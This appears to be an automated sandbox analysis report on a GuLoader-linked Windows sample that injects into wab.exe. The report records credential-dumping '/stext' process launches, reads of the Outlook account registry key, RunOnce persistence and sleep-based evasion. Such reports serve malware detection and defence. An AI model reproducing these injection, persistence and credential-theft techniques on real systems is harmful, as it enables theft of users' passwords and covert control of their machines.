              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040755A4_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0043C5604_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044B6104_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044D6C04_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004476F04_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044B8704_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044081D4_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004149574_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004079EE4_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00407AEB4_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044AA804_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00412AA94_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00404B744_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00404B034_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044BBD84_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00404BE54_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00404C764_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00415CFE4_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00416D724_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00446D304_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00446D8B4_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0040D0445_2_0040D044
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004050385_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004050A95_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0040511A5_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004051AB5_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004382F35_2_004382F3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004305755_2_00430575
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0043B6715_2_0043B671
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0041F6CD5_2_0041F6CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004119CF5_2_004119CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00439B115_2_00439B11
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00438E545_2_00438E54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00412F675_2_00412F67
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0043CF185_2_0043CF18
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004050C26_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004014AB6_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004051336_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004051A46_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004012466_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0040CA466_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004052356_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004032C86_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004016896_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00402F606_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes\trivalente.vid 49DCDF0CE96754B433C373ADBBA4B5B8B048F7E5DD1A0F9424500B79636D4722
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\BgImage.dll 27D3E3E359E1E04B173277221055D043E2F3BAAF78A5D6F7E3A0A5DFCB96222C
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile created: C:\Windows\resources\0409Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00412968 appears 78 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00421A32 appears 43 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044407A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_034A3947 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,2_2_034A3947
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00401806 NtdllDefWindowProc_W,4_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004018C0 NtdllDefWindowProc_W,4_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004016FC NtdllDefWindowProc_A,5_2_004016FC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004017B6 NtdllDefWindowProc_A,5_2_004017B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00402CAC NtdllDefWindowProc_A,6_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00402D66 NtdllDefWindowProc_A,6_2_00402D66
              Source: SMGS-RCDU5010031.exeStatic PE information: invalid certificate
              Source: SMGS-RCDU5010031.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile created: C:\Users\user\Videos\frifundne.iniJump to behavior
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/32@3/3
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,4_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,4_2_0040B58D
              Source: SMGS-RCDU5010031.exeReversingLabs: Detection: 42%
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile read: C:\Users\user\Desktop\SMGS-RCDU5010031.exeJump to behavior
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SMGS-RCDU5010031.exe C:\Users\user\Desktop\SMGS-RCDU5010031.exe
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\SMGS-RCDU5010031.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uhrhlaw
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ebwamkguuyj
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gdbsndrnigbudr
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\SMGS-RCDU5010031.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uhrhlawJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ebwamkguuyjJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gdbsndrnigbudrJump to behavior
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,6_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile created: C:\Users\user\AppData\Local\Temp\nsw158A.tmpJump to behavior
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402095
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_004045AF GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045AF
              Source: wab.exe, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000002.00000002.16935346240.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,4_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\ourvbpld-RBN2WW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: SMGS-RCDU5010031.exeStatic file information: File size 2729832 > 1048576
              Source: SMGS-RCDU5010031.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000000.00000002.12044516719.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.16907433078.00000000030B1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.12043367453.0000000000627000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SMGS-RCDU5010031.exe PID: 1508, type: MEMORYSTR
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_37571219 push esp; iretd 2_2_3757121A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_37562806 push ecx; ret 2_2_37562819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044693D push ecx; ret 4_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044DB70 push eax; ret 4_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044DB70 push eax; ret 4_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00451D54 push eax; ret 4_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00444355 push ecx; ret 5_2_00444365
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004446D0 push eax; ret 5_2_004446E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004446D0 push eax; ret 5_2_0044470C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0044AC84 push eax; ret 5_2_0044AC91
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00414060 push eax; ret 6_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00414060 push eax; ret 6_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00414039 push ecx; ret 6_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004164EB push 0000006Ah; retf 6_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00416553 push 0000006Ah; retf 6_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00416555 push 0000006Ah; retf 6_2_004165C4
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile created: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\nsExec.dllJump to dropped file
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile created: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\BgImage.dllJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\Skyggelgningen\Etpartisystemers.exeJump to dropped file
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile created: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeFile created: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\nsDialogs.dllJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TelefonvsenetJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TelefonvsenetJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TelefonvsenetJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TelefonvsenetJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_004047C6
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1612Thread sleep count: 3602 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4048Thread sleep count: 81 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4048Thread sleep time: -40500s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3048Thread sleep count: 5351 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3048Thread sleep time: -16053000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3602 delay: -5Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3602Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5351Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1754Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.7 %
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeAPI call chain: ExitProcess graph end nodegraph_0-3904
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeAPI call chain: ExitProcess graph end nodegraph_0-3725
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\paqlgkfs.datJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Temp\gdbsndrnigbudrJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Temp\ebwamkguuyjJump to behavior
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00418981 memset,GetSystemInfo,4_2_00418981
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_375610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_375610F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_37566580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,2_2_37566580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_37564AB4 mov eax, dword ptr fs:[00000030h]2_2_37564AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_37562639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_37562639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_3756724E GetProcessHeap,2_2_3756724E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_00404149 LdrInitializeThunk,SendMessageW,0_2_00404149
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_37562B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_37562B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_37562639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_37562639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_375660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_375660E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeSection loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Program Files (x86)\Windows Mail\wab.exe protection: read writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
